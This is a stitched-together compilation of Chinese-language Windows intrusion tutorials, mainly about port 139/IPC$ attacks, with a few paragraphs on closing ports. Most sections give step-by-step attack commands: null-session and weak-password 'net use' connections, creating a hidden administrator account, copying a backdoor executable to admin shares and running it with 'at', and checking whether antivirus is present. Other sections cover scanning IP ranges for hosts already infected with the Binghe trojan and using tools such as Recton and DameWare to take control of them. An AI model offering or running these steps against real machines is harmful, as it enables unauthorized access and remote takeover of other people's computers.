139端口入侵简易教程
139端口入侵

Share name Type Used as Comment
IPC成功建立后,服务器的共享资源列表才能访问到
我们在看一下有没有可以用net命令进行连接的。
c:\>net use x: \\[ipaddr]\[share]
键入regedit。
选择Registry -> Connect Network Registry,
再键入那台机器的IP地址。不一会,就能看目标计算机的的Registry了。
呵呵,搞定了
这个命令很有用呀
C:\>net use \\0.0.0.0\ipc$ 密码/user:用户名
-S 列出和目标IP地址会话的表
-s 列出会话表转换
OK,我们在来看看共享
C:\>net view \\[目标计算机的IP地址]
不过有可能会被拒绝
在试试C:\>net use \\IP\ipc$ "" /user:""
The completed successfully.
万一不行的话我们就用上面的方法IPC$
一旦IPC$共享顺利完成,我们就可以映射了,(晕,不知什么是映射,下次在说吧):
c:\>net use g: \\IP\c$
得到了C$共享,并将该目录映射到g:,键入:
c:\>dir g: /p
就能显示这个目录的所有内容。
成功地进行了IPC$连接后,点击Start -> Run,
开关:
-a 列出给定主机名的远程计算机的名字表(name table)
校园网入侵操作步骤

校园网入侵操作步骤校园网入侵操作步骤一、条件准备下载三个黑客软件:NTscan变态扫描器、Recton v2.5、DameWare迷你中文版4.5。
NTscan变态扫描器可以对指定IP地址段的所有主机进行扫描,扫描方式有IPC扫描、SMB扫描、WMI扫描三种,可以扫描打开某个指定端口的主机,通过扫描可以得到其中弱口令主机的管理员用户名和密码。
Recton v2.5是一个典型的黑客攻击软件,只要拥有某一个远程主机的管理员账号和密码,并且远程主机的135端口和WMI 服务(默认启动)都开启,就可以利用该软件完成远程开关telnet,远程运行CMD命令,远程重启和查杀进程,远程查看、启动和停止服务、查看和创建共享、种植木马、远程清除所有日志等操作。
DameWare迷你中文版4.5是一款远程控制软件,只要拥有一个远程主机的账号和密码,就可以对该主机实施远程监控,监视远程主机的所有操作甚至达到控制远程主机的目的。
另外选择两台操作系统为Windows XP Professional的主机,其中一台作为实施攻击的主机(以下称“主机A”),另一台作为被攻击的主机(以下称“主机B”),并将两台主机接入局域网中。
二、模拟攻击前的准备由于本次模拟攻击所用到的黑客软件均可被较新的杀毒软件和防火墙检测出并自动进行隔离或删除的处理,因此,在模拟攻击前要先将两台主机安装的杀毒软件和防火墙全部关闭。
然后打开“控制面板”中的“windows安全中心”,执行“windows防火墙”设置,将“windows防火墙”也关闭,如图所示。
由于在默认的情况下,两台主机的IPC$共享、默认共享、135端口和WMI服务均处于开启状态,因此对共享、端口和服务不做任何调整。
设置主机A的IP地址为“172.16.100.1”,主机B的IP地址为“172.16.100.2”(IP地址可以根据实际情况自行设定),两台主机的子网掩码均应为“255.255.0.0”。
十三步简单入侵个人电脑教程

⼗三步简单⼊侵个⼈电脑教程 ⽊马冰河是⼀款功能强⼤的远程控制软件,因为它的功能很强⼤所以成为了⿊客们发动⼊侵的⼯具,2HK联盟Mask曾利⽤它⼊侵过数千台电脑,国外电脑也不例外,⼀起来看看哪⼗三步简单⼊侵个⼈电脑吧。
第⼀步 下载必备的⼯具软件。
1号软件就是端⼝扫描⼯具“⽹络刺客II”,2号软件就是著名的国产⽊马冰河2.2的控制端. 下载完毕并解压缩之后跟我进⾏第⼆步! 第⼆步 运⾏1号软件,⾸先出现的是“⽹络刺客II注册向导”,别理它,点击“稍后(Q)”就进⼊了⽹络刺客II的主界⾯。
第三步 在⽹络刺客II的主界⾯⾥选“⼯具箱(U)”-》“主机查找器(H)”,就进⼊了“搜索因特⽹主机”界⾯。
第四步 进⼊“搜索因特⽹主机”界⾯后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX⾃⼰去选择了,⽐如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前⾯⼀样。
“端⼝”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这⼀段IP地址中有冰河⽊马的计算机了,再检查⼀下填对没有?如果⼀切OK,请点击“开始搜索”。
第五步 观察“总进度”和“段进度”是否在⾛动。
如果没有⾛动,那⼀定是IP地址设置不对,请认真检查。
如果两个进度都在⾛动,呵呵,你就成功⼀半了,⾄少你会使⽤⽹络刺客II扫描⽹上开放某⼀端⼝的计算机了。
下⾯你要作的就是静静的等待,学⽤⿊客软件是需要耐⼼的。
⼤约20-30分钟后,最下⾯的记录栏⾥就应该出现记录了(⼀般情况下,应该有5、6条记录)。
每⼀条记录找到的中了冰河⽊马的⼀台计算机,前⾯是该计算机的IP地址,后⾯是7626(冰河⽊马端⼝)。
第六步点击“停⽌搜索”,但不要退出程序,到第⼗⼆步时还要⽤。
运⾏2号软件冰河,进⼊冰河主界⾯。
选“⽂件[F]”-》“添加主机[A]”进⼊添加主机窗⼝。
Windows作业系统的port139入侵

22
建立最高權限帳戶
* 原理與說明---Windows系統本身會提供一個小工具
net.exe,執行它即可建立最高權限帳戶
Net指令
這裡不變 密碼,自己取 用戶名稱自取
net user hacker 1234 /add
這裡不變
net localgroup administrators hacker /add
14
按確定
15
HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo ntrolSet\Services\lanmanserver\shar es
16
5.WinNT、Win2K的預設共用漏洞
Windows 2000/XP/2003版本的作業系統提供了預設共 用功能,這些預設的共用都有“$”標誌,意為隱含的, 包括所有的邏輯硬碟(C$,D$,E$……)和系統目錄 Winnt或Windows(admin$)。 帶來的問題: 微軟的初衷是便於網管進行遠端管理,這雖然方便了 局域網用戶,但對我們個人用戶來說這樣的設定是不 安全的。如果電腦連上網路,網路上的任何人都可以 通過共用硬碟,隨意進入你的電腦。所以我們有必要 關閉這些共用。更為可怕的是,駭客可以通過連接你 的電腦實現對這些預設共用的入侵。
是否磁碟需要給其他 連線電腦使用? Y
N 關閉所有共享資源
N 使用Win9X or WinMe? Y 修補密碼漏洞
設定個別使用者權限與密碼 (Win2K/Win XP適用)
N 是否提供唯讀(Read Only) Y 設定只可唯讀
設定不易猜到的密碼與用戶 名稱
6
關閉Port 139
(2)此項目打勾取消 (3)按下此按鈕
屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧

屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。
为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和UDP 135、137、138、445 端口,一些流行病毒的后门端口(如TCP 2745、3127、6129 端口),以及远程服务访问端口3389。
下面介绍如何在WinXP/2000/2003下关闭这些网络端口:第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建IP 安全策略”(如右图),于是弹出一个向导。
在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何IP 地址”,目标地址选“我的IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮(如左图),这样就添加了一个屏蔽TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加TCP 137、139、445、593 端口和UDP 135、139、445 端口,为它们建立相应的筛选器。
局域网入侵方法介绍

局域网入侵方法介绍局域网入侵教程对于有些人来说非常重要,很是想要了解一些入侵方法,但是要掌握这些其实还是存在着一些难题。
下面由小编给你做出详细的局域网入侵方法介绍!希望对你有帮助!局域网入侵方法介绍:局域网入侵方法一:不过比如说在学校的时候,可以进入到整个学校网。
一般如果可以入侵的时候,一般就是有弱口令存在,主要就是其中还包含了139端口,不过其中的防火墙这方面的机子没有开。
所以这个时候需要有入侵工具,对于局域网入侵教程来说,所谓的工具主要就是包含以下这些:首先学习好局域网入侵教程,就是包含了变态扫描器、还有迷你中文版等各种工具,而且在工具之中还包含了杀毒软件,具有了报毒的作用。
在入侵的过程中,需要有变态扫描器,就是在IP地址之中,把需要进行扫描的地址给填上。
然后就是扫描的时候是选择WMI的方式,这样就是按开始键等就可以了,有关局域网ip如何设置的问题。
然后就是面贺杀专用版的名字就是Recton--D,也就是可以将CMD命令选择,然后把"net share C$=C:\"输入其中,这样就是把其余主机之中共享C盘那里进行开启。
这样的局域网入侵教程能够带给人们一些效益。
最后可以将这个变成D、E或者是F等,这样可以把其他盘之中的共享也可以进行开启,在这个过程中其实具有着很高的隐蔽性,而且共享是包含了完全的特点,有关win7防火墙设置问题。
就是这样,便能够达到对方电脑的C盘之中,然后根据自己掌握的技术把CMD 选项成功执行命令。
也就是通过这个方法可以达到局域网入侵的目的,所以必需要掌握局域网入侵教程。
局域网入侵方法二:点我的电脑右键单机管理,然后点操作底下的=》连接到另外一个计算机。
输入对方ip或者你不知道对方ip 可以这样,点浏览高级里的立即查找,就可以显示本局域网工作组内的计算机了。
然后双击你要进入的电脑,呵呵一般局域网的计算机密码是一样的,所以不需要NTLM验证,不过那个验证比较老了,现在不知道还有没有人会用,进入后然后点服务和应用,找到telnet服务,然后开启对方telnet服务,如果没有进入这些界面或者服务出错是因为对方没有开rpc服务,当然还是选择放弃吧,如果按照刚才步骤成功,那恭喜你已经得到一个进入对方计算机的通道了。
ipc$入侵

用TELNET弱口令我给你例子看好了c:\>telnet 192.168.0.1user:administratorpossword:[如果是弱口令密码可能是空的或是简单的]下面就进入他的shall了c:\>net user hacker[用户] hacker[密码自己定义] /addc:\>net localgroup administrator hacker [用户] /add这是个自己在他的计算机中建立自己的用户并提升为管理员权限还有你可以用IPC$命令攻击ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)五ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径: 网络有问题;错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
139端口入侵

139端口入侵(更加详细)附图下面先给大家介绍一下什么是NETBIOS:Netbios(NETwork Basic Input/Output System)网络基本输入输出系统。
是1983年IBM开发的一套网络标准,微软在这基础上继续开发。
微软的客户机/服务器网络系统都是基于NetBIOS的。
在利用Windows NT4.0 构建的网络系统中,对每一台主机的唯一标识信息是它的NetBIOS名。
系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。
在这样的网络系统内部,利用NetBIOS名实现信息通讯是非常方便、快捷的。
但是在In ternet上,它就和一个后门程序差不多了。
不少骇客就是通过这个漏洞入侵计算机的!下面是经常用的139端口的攻与防第一步我们需要做的是确定一台存在139端口漏洞的主机。
可以用扫描工具扫描得到!我就不说了第二步假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!如下图:上图中的202.98.84.90就是我的IP地址,这个主机的名字是21,工作组是YB第三步我们要做的是与对方计算机进行共享资源的连接在这里我们需要用到两个NET命令,下面就是这两个命令的使用方法NET VIEW?作用:显示域列表、计算机列表或指定计算机的共享资源列表。
?命令格式:net view [\\computername | /domain[:domainname]]?参数介绍:?<1>键入不带参数的net view显示当前域的计算机列表。
?<2>\\computername 指定要查看其共享资源的计算机。
?<3>/domain[:domainname]指定要查看其可用计算机的域?NET USE?作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
139端口入侵简易教程;
net use \\192.168.0.1\ipc$ "" /user:administrator
提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。
首先,连接的命令是:
net<空格>use<空格>\\IP地址\ipc$<空格>密码<空格>/user:用户名
假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:
net use \\192.168.1.11\ipc$ 123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"!
空密码是这样的:
如果密码是空的,那就在原先输入密码的地方以""代替。
开始查看权限:
查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。
命令的格式是这样的:
copy<>文件绝对路径<>\\IP地址\文件目标路径
比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:
copy c:\a.exe \\192.168.1.11\d$
要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。
如果命令执行成功,系统同样会提示"已复制1 个文件"
小技巧:
再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!
如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。
如果没有提示,则说明安装了杀毒软件。
查看目标系统时间,准备使用at任务计划运行程序。
命令格式:
net<空格>time<空格>\\IP地址
例子:
net time \\192.168.1.11
系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。
比如系统显示“\\192.168.1.11 的当前时间是2006/5/10 下午06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!
使用AT命令为目标系统添加任务计划:
格式:
at<空格>\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名
例子:
at \\192.168.1.11 18:20 d:\a.exe
IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。
但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。
所以,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。